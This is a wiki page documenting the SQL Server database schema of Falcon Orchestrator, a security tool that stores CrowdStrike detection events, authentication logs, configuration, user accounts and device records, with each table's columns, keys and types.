This repository has been archived by the owner on Jan 17, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 54
Database Schema
Evan Burns edited this page May 25, 2016
·
6 revisions
This page provides full documentation of the database schema applied to the Falcon Orchestrator backend. The database engine used is Microsoft SQL Server, tested with version 2014 however should be compatible with other versions as well. The version number identified the first schema version in which the given field first appeared.
Stores all detection events from the Falcon Host Streaming API.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| DetectionId | PK | 1 | int | Unique identifier in database for each detection event |
| Offset | 1 | nvarchar(max) | Offset number provided by API to keep track of location i n stream. This is used to identify unique detection events from the API stream and ensure no duplicate entries are stored in the database | |
| Timestamp | 1 | datetime | timestamp of when the system saved the detection event to the database | |
| ProcessStartTime | 1 | datetime | Provided by API, timestamp for when the process started ProcessEndTime | |
| ClosedDate | 1 | datetime | Timestamp for the detection was set to a closed status. | |
| Name | 1 | nvarchar(max) | This is the scenario of detection and describes the threat (Known Malware, Drive By Download, etc.) | |
| Description | 1 | nvarchar(200) | A full description of the detection scenario identified. | |
| ProcessId | 1 | nvarchar(100) | Process Id of the offending process. | |
| ParentProcessId | 1 | nvarchar(100) | Parent Process id of the offending process. | |
| CommandLine | 1 | nvarchar(max) | Command line and argument for how the process was executed. | |
| FileName | 1 | nvarchar(max) | Name of the file executed. | |
| FilePath | 1 | nvarchar(max) | ||
| FalconHostLink | 1 | nvarchar(500) | Link to the detection event in the Falcon host UI. | |
| SHA256 | 1 | nvarchar(64) | SHA256 of the offending file or process. | |
| MD5 | 1 | nvarchar(32) | MD5 of the offending file or process. | |
| SHA1 | 1 | nvarchar(40) | SHA1 of the offending file or process. | |
| Comment | 1 | nvarchar(max) | Analyst provided commentary to explain resolution or findings. | |
| AccountId | FK | 1 | int | Foreign key to the Accounts table for the associated user account. |
| DetectionDeviceId | FK | 1 | int | Foreign key to the DetectionDevices table for the associated device. |
| StatusId | FK | 1 | int | Foreign to key Status table, this defaults to a status of open and is modified either manually by an analyst or via a whitelisting or taxonomy rule. |
| VendorSeverityId | 1 | int | Id to the severities table for the severity provided by CrowdStrike. | |
| CustomSeverityId | FK | 1 | int | Foreign key to the severities table for the custom severity rating. This defaults the rating provided by CrowdStrike but can be overridden manually by an analyst or via a taxonomy rule. |
| CustomerId | FK | 1 | int | Foreign key to the customers table. Identifies the unique instance of Falcon Host. |
| ResponderId | FK | 1 | int | Foreign key to the responders table. Defaults to null unless responders are created and assigned via the scheduling functionality. |
Application configuration settings are stored in this table. These are typically account credentials and attributes to enable integration functionality. Refer to the configuration itemization for the listing of predefined keys.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| ConfigId | PK | 1 | int | Unique identifier for configuration item |
| Key | 1 | nvarchar(max) | The name of the configuration key | |
| Value | 1 | nvarchar(max) | Configuration key value |
Stores all authentication audit logs provided by the Falcon Host Streaming API.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| AuthId | PK | 1 | int | Unique database identifier for each authentication log event |
| OperationName | 1 | nvarchar(50) | The name of the authentication related operation that was carried out | |
| ServiceName | 1 | nvarchar(50) | ||
| Success | 1 | bit | Whether the authentication activity was successful or not | |
| UserId | 1 | nvarchar(50) | The username of the account associated to the operation | |
| UserIp | 1 | nvarchar(45) | The IP address of the user account responsible for the operation | |
| Timestamp | 1 | datetime | Timestamp of when the operation occured | |
| Offset | 1 | nvarchar(max) | Provided by API to keep track of location in stream. Uniquely identified log to ensure no duplicates are stored. | |
| Entitlement | 1 | nvarchar(100) | the entitlement granted or revoked by the authentication activity. | |
| EntitlementGroup | 1 | nvarchar(100) | the entitlement group granted or revoked by the authentication activity. | |
| TargetName | 1 | nvarchar(200) | user account that the operation was applied to. | |
| CustomerId | FK | 1 | int | Identifier for the CID provided in API stream. This allows for differentiation of multiple Falcon Host instances. |
User account information is stored in this table. An account record is associated with each detection event. The majority of these fields are populated by integration to Active Directory.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| AccountId | PK | 1 | int | Unique database identifier for each user account |
| Timestamp | 1 | datetime | Timestamp of when the account record was created or last modified | |
| AccountName | 1 | nvarchar(50) | The name of the user account, provided by the Falcon Host Streaming API | |
| FirstName | 1 | nvarchar(50) | The first name of the user associated to the account | |
| LastName | 1 | nvarchar(50) | The last name of the user associated to the account | |
| Department | 1 | nvarchar(50) | The department the user belongs to | |
| JobTitle | 1 | nvarchar(45) | The job title of the user | |
| Manager | 1 | nvarchar(75) | Email address of the user's manager | |
| EmailAddress | 1 | nvarchar(75) | Email address of the user associated to the account | |
| PhoneNumber | 1 | nvarchar(20) | User's phone number | |
| Country | 1 | nvarchar(50) | Country user is located in | |
| StateProvince | 1 | nvarchar(50) | State or Province user is located in | |
| City | 1 | nvarchar(50) | City user is located in | |
| StreetAddress | 1 | nvarchar(75) | Street and Address user is located in | |
| LastLogon | 1 | datetime | Timestamp of when user account last logged in | |
| OrganizationalUnit | 1 | nvarchar(max) | Active Directory OU user is stored under |
A junction table used to manage the many to many relationship between Account and Ticket entities.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| AccountTicketId | PK | 1 | int | Unique database identifier for each record |
| AccountId | FK | 1 | int | Foreign key to to the Accounts table |
| TicketId | FK | 1 | int | Foreign key to the Tickets table |
Primarily used to manage multi-tenant environments. Each record in this table represents a unique instance of Falcon Host. the CustomerIdString (or CID for short) is the unique identified for each instance.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| CustomerId | PK | 1 | int | Unique database identifier for each record |
| CustomerIdString | 1 | nvarchar(max) | Unique identifier for each falcon host instance. This value is provided from the Falcon Streaming API. | |
| Name | 1 | nvarchar(100) | User supplied value to provide a human consumable name for the instance. |
Junction table linking devices and detections. This is needed in order to manage scenarios where there are multiple detections for a given device, however the IP address allocated at the time of each detection is different.
| Attribute | Key | Version | Type | Description |
|---|---|---|---|---|
| DetectionDeviceId | PK | 1 | int | Unique database identifier for each record |
| IPAddress | 1 | nvarchar(45) | IP Address of the device at the time of the detection. Either manually supplied for a user or dynamically resolved through the DNS Lookup processing rule. | |
| DeviceId | FK | 1 | int | Foreign key to the Devices table. |